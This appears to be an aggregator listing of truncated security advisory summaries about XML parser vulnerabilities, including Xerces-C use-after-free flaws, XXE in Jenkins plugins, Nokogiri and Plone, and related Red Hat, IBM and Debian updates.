Security Bulletin: IBM App Connect Enterprise & IBM Integration Bus are affected by vulnerabilities in Apache Xerces-C 3.0.0 to 3.2.2 XML parser (CVE-2018-1311)

Summary Vulnerabilities in Apache Xerces-C 3.0.0 to 3.2.2 XML parser affect IBM Integration Bus and IBM App Connect Enterprise . IBM App Connect Enterprise and IBM Integration Bus have addressed the applicable CVEs Vulnerability Details CVEID: CVE-2018-1311 DESCRIPTION: Apache Xerces-C could allo...

Important: Red Hat Security Advisory: OpenShift Container Platform 4.5.27 packages and security update

Red Hat OpenShift Container Platform release 4.5.27 is now available with updates to packages and images that fix several bugs and add enhancements. This release also includes a security update for Red Hat OpenShift Container Platform 4.5. Red Hat Product Security has rated this update as having ...

jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks

A flaw was found in the mercurial plugin in Jenkins. The XML changelog parser is not configured to prevent an XML external entity XXE attack allowing an attacker the ability to control an agent process to have Jenkins parse a crafted changelog file that uses external entities for extraction of...

RHEL 7 : OpenShift Container Platform 4.5.27 (RHSA-2021:0034)

The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0034 advisory. Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or privat...

jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks

A flaw was found in the subversion Jenkins plugin. The XML parser is not properly configured to prevent XML external entity XXE attacks allowing an attacker the ability to control an agent process and have Jenkins parse a crafted changelog file that uses external entities for extraction of secret...

RHEL 7 / 8 : OpenShift Container Platform 4.6.12 (RHSA-2021:0038)

The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0038 advisory. Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or...

CVE-2021-23926

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0...

CVE-2021-23926

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0...

Code injection

A vulnerability has been identified in JT2Go All versions V13.1.0, Teamcenter Visualization All versions V13.1.0. When opening a specially crafted xml file, the application could disclose arbitrary files to remote attackers. This is because of the passing of specially crafted content to the...

IBM HTTP Server 7.0.0.0 <= 7.0.0.45 / 8.0.0.0 <= 8.0.0.15 / 8.5.0.0 < 8.5.5.17 / 9.0.0.0 < 9.0.5.1 Multiple Vulnerabilities (964768)

The version of IBM HTTP Server running on the remote host is affected by multiple vulnerabilities as follows: - In libexpat in Expat before 2.2.7, XML input including XML names that contain a large number of colons could make the XML parser consume a high amount of RAM and CPU resources while...

XML External Entity (XXE)

ploneappdexterity is vulnerable to XML External Entity XXE. An attacker with manager role is able to submit requests on behalf of the server and gain access to internal resources. The vulnerability exist when XML input containing a reference to an external entity is processed by a weakly configur...

XML External Entity (XXE)

Nokogiri is vulnerable to XML external entity XXE attack. The vulnerability exist as the external DTDs are enabled by default in the XML parser, which would allow an attacker to submit requests on behalf of the server and gain access to internal and local resources...

CVE-2020-26247 XXE in Nokogiri

Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri before version 1.11.0.rc4 there is an XXE vulnerability. XML Schemas parsed by Nokogiri::XML::Schema are trusted by default, allowing external resources to be accessed over the...

Debian DLA-2498-1 : xerces-c security update

The UK's National Cyber Security Centre NCSC discovered that Xerces-C, a validating XML parser library for C++, contains a use-after-free error triggered during the scanning of external DTDs. An attacker could cause a Denial of Service DoS and possibly achieve remote code execution. This flaw has...

Debian DSA-4814-1 : xerces-c - security update

It was discovered that xerces-c, a validating XML parser library for C++, did not correctly scan DTDs. The use-after-free vulnerability resulting from this issue would allow a remote attacker to leverage a specially crafted XML file in order to crash the application or potentially execute arbitra...

Debian: Security Advisory (DLA-2498-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2020 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

[SECURITY] [DLA 2498-1] xerces-c security update

------------------------------------------------------------------------- Debian LTS Advisory DLA-2498-1 [email protected] https://www.debian.org/lts/security/ December 17, 2020 https://wiki.debian.org/LTS - -------------------------------------------------------------------------...

[SECURITY] [DSA 4814-1] xerces-c security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4814-1 [email protected] https://www.debian.org/security/ Sebastien Delafond December 17, 2020 https://www.debian.org/security/faq -...

[SECURITY] [DSA 4814-1] xerces-c security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4814-1 [email protected] https://www.debian.org/security/ Sebastien Delafond December 17, 2020 https://www.debian.org/security/faq -...

NewStart CGSL CORE 5.05 / MAIN 5.05 : xerces-c Vulnerability (NS-SA-2020-0114)

The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has xerces-c packages installed that are affected by a vulnerability: - The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been...